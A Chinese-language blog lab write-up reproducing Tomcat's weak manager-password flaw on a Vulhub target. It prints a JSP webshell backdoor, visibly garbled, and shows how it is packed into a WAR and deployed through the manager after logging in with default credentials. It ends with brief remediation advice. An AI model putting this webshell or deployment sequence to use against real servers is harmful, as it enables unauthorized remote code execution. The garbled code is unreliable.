初识tomcat漏洞--tomcat弱密码漏洞复现

于 2024-07-03 22:41:50 发布
阅读量414 收藏 10
点赞数 5
文章标签: tomcat java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62056583/article/details/140164006
版权

1.实验目的

1、能成功搭建漏洞测试与测试工具所需的运行环境

2、能成功利用漏洞原理测试复现漏洞

2覆盖知识

配置文件处理不当导致可被弱密码登录

Getshell漏洞注入

3实验环境与操作

实验环境

1、VMware Workstation 16

2、Ubuntu 20.4

3、Vulhub靶场

4、kali

实验步骤

1.在Ubuntu中搭建相应的环境

cd vulhub/tomcat/tomcat8

docker-compose up –d

搭建完成后查看环境所开启的端口为8080,然后打开相应的服务:192.168.32.135:8080

  1. 复现开始

进入后台,登录用户密码为tomcat

进入后台后,进行war包制作

<%@pageimport="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader(U(ClassLoader c)(super(c);)publicClass g(byte [b)(return super. defineClass(b,0,b.length))%><%if(request.getParameter("pass")!=null)(String k=

(""+UUlD.randomUUID0).replace("-"").substring(1,6);session.putValue("u",k);out.print(k);return;)Cipher c=Cipher.getlnstance

("AES");c.init(2,newSecretKeySpec((session.getValue("u")+ ").getBytes(),"AES"));newU(this.getclass().getClassoader).g(c.dFinal(newsun.misc.BASE64Decoder().decodeBuffer(request.getReader().readine)).newInstande.equals(pageContext);%>

参照网上的代码先进行jsp文件的制作,时间紧急没有对它进行查看然后将它转化为war包

jar -cvf testt.war “test.jsp”

在deploy上传war包

war包的路径为网站根目录/war包名称/后门名称(eg:/testt/test.jsp)

虽然有代码错误但是我们可以看到通过对tomcat弱口令登录之后我们确实在deploy成功上传了我们想要执行的shell的代码,这可以看出确实能够做出恶意的操作。

修补方案

  1. 可以修改配置文件,将存在后门的用户密码账号设置符合复杂度的要求;
  2. 限制对于manage/html目录访问的权限。

霞日
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第01课时-初识数据结构.pptx
12-06
第01课时-初识数据结构 数据结构是计算机程序设计的基础,涉及数据抽象、建模、算法设计、编写程序等多个方面。数据结构的概念是指数据元素之间的相互关系,即数据的组织形式。它包括了三个方面的内容:数据元素...
Tomcat漏洞详解
m0_64481831的博客
03-06 2746
Tomcat是一种轻量级的web服务器,主要负责运行jsp和Servlet具有任意文件写入漏洞:主要影响7.0-7.8左右,原因是因为配置不当问题(conf/web.xml文件的readonly参数定义为false),导致可以使用PUT方法进行任意文件上传。jsp绕过方法有斜杠绕过、空格绕过和::$DATA绕过(后两者都需要在Windows下)具有文件包含漏洞:主要影响6和8版本,7和9版本有少数;原因是因为AJP协议存在缺陷而导致攻击者可以构造任意参数来进行任意文件包含和读取文件。
Tomcat漏洞三剑客
m0_67284865的博客
07-02 625
Tomcat 支持通过后端部署 war 文件,所以我们可以直接将 webshell 放入 Web 目录下。为了访问后端,需要权限。Tomcat7+ 的权限如下:manager(后台管理)manager-gui 拥有html页面权限manager-status 拥有查看status的权限manager-script 拥有text接口的权限,和status权限manager-jmx 拥有jmx权限,和status权限host-manager(虚拟主机管理)
如何使用ApacheTomcatScanner扫描Apache Tomcat服务器漏洞
顶峰
02-28 2558
1、支持使用多线程Worker搜索Apache Tomcat服务器;2、支持扫描多个目标:支持接收一个Windows域中的目标计算机列表,支持从文件按行读取目标,支持使用–t/–target选项读取单个目标(IP/DNS/CIDR);3、支持自定义即设置端口列表;4、支持测试/manager/html访问和默认凭证;5、支持使用–list-cves选项查看每个版本的CVE漏洞信息;1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。
中间件漏洞测试——Tomcat
qq_43592364的博客
08-13 2331
注意:下列漏洞复现是使用Ubuntu+docker实现的环境完成的,其中提到的IP通过Ubuntu虚拟机中的ifconfig命令查看,端口不变,需要环境的可通过docker相关环境下载 一、管理界面口令getshell 1、漏洞简述&影响版本 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为口令,攻击者容易进行暴力破解登录后台并进行应用管理 影响版本:全版本 常见后台地址:http://1.1.1....
【vulhub靶场】Tomcat中间件漏洞复现
最新发布
M372109150的博客
05-04 1870
本文主要是对tomcat中间件相关漏洞复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 密码和后端 Getshell 漏洞
项目1-初识计算机ppt课件.ppt
11-15
项目1-初识计算机ppt课件.ppt
初识Spring框架-资料.rar
03-26
初学者通过“初识Spring框架-资料.rar”这个压缩包,可以系统地了解和学习Spring的基本概念、核心特性以及在实际开发中的应用。 1. **Spring概述**: Spring最初由Rod Johnson创建,旨在解决企业应用开发的复杂性...
任务9-1-初识人工智能.docx
12-18
【人工智能定义】人工智能(Artificial Intelligence,简称AI)是由人类制造出来的机器表现出的智能,它是一种模拟人类智能或超越人类智能的技术。它涉及到自动化处理、数据挖掘、模式识别等多个领域。...
初识HTML5》-课件公开课.pptx
12-19
HTML5 基础知识点 ... ... ...这些标签或标记是以尖括号 "和 ">" 围起来的,例如: `<head>`、`<title>`、`<body>` 等。...头部主要用于定义文档的元数据,如标题、样式和脚本等,而主体则用于显示网页的内容。...
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具
07-01
这才是真正D.S.T内部用的(tomcat漏洞)扫描工具解压缩密码: vip2008
tomcat漏洞利用工具
白昼小丑的博客
11-20 2136
口令爆破加上全路径:/manager或/host-manager。tomcat-pass-getshell 认证部署war包。CVE-2020-1938 Tomcat 文件读取/包含。CVE-2017-12615 PUT文件上传漏洞Tomcat 漏洞检测工具。
Apache Tomcat CVE-2020-1938 漏洞
m0_54866636的博客
09-09 1211
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
tomcat常见漏洞
qq_46416934的博客
06-18 3282
目录前言一、任意文件上传1.1 影响版本1.2 初始配置1.3 漏洞详情二、CVE-2020-1938?文件包含漏洞2.1 影响版本2.2 漏洞详情三、未授权口令+war后门上传总结tomcat和apache一样是一个免费的服务器,主要用于jsp框架的网站,可以看作是apache的一个扩展,但是运行的时候和apache属于不同的进程。本文主要介绍tomcat的未授权访问、任意文件上传、文件包含漏洞tomcat 7.0.x --------------cve-2017-12615需要在windows下将配
Tomcat文件包含漏洞(CVE-2020-1938)
qq_58000413的博客
09-16 2578
Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件。漏洞造成的原因是由于ajp设计缺陷,我们可以通过修改Tomcat ajp协议的端口,也可直接考虑关闭ajp connectoy,来避免攻击者攻击。用的是python2。
Tomcat 爆出高危漏洞及修复
Happy Simon
03-13 6152
今天跟大家分享Tomcat 爆出高危漏洞及修复的知识。 1 Tomcat 爆出高危漏洞及修复 1.1 漏洞背景 2020年02月20日, 360CERT 监测发现 国家信息安全漏洞共享平台(CNVD) 收录了 CNVD-2020-10487 Apache Tomcat文件包含漏洞 Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsyste...
跟我学,你的服务器够安全吗?第四篇----tomcat安全
zhumengyisheng的博客
12-10 3278
跟我学,你的服务器安全吗?是不是有黑客入侵啊?服务又瘫痪了?本节讲述互联网基础服务之一tomcat安全配置问题和相关的漏洞恢复,一定要尽可能配置好,不要等事后攻击发生了追悔,言之晚矣
Xcode4.3教程:初识iPhone编程-HelloWorld
"这篇学习笔记主要介绍了基于Xcode4.3的初识iPhone编程,以创建经典的'HelloWorld'程序为例,逐步引导读者了解工程创建、视图操作、代码添加及程序运行的基本流程。" 在iOS开发中,Xcode是苹果官方推荐的集成开发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值